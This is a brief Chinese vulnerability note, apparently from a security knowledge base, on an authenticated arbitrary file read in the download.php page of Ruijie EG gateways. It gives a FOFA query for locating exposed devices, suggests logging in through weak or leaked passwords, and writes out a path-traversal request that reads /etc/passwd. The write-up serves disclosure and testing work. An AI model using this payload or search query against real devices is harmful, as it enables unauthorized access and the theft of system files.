锐捷EG易网关download.php后台任意文件读取漏洞¶
一、漏洞简介
锐捷EG易网关download.php后台任意文件读取漏洞
二、影响版本
锐捷 EG易网关
三、资产测绘
●登录页面
fofa:app="Ruijie-EG易网关"
四、漏洞复现
1通过弱口令或账号密码泄露漏洞登录后台获取cookie
2通过上一步获取的cookie执行
/download.php?a=read_txt&file=../../../../etc/passwd
更新: 2024-06-24 11:42:26
原文: https://www.yuque.com/xiaokp7/ocvun2/ecv5820erlgsur8o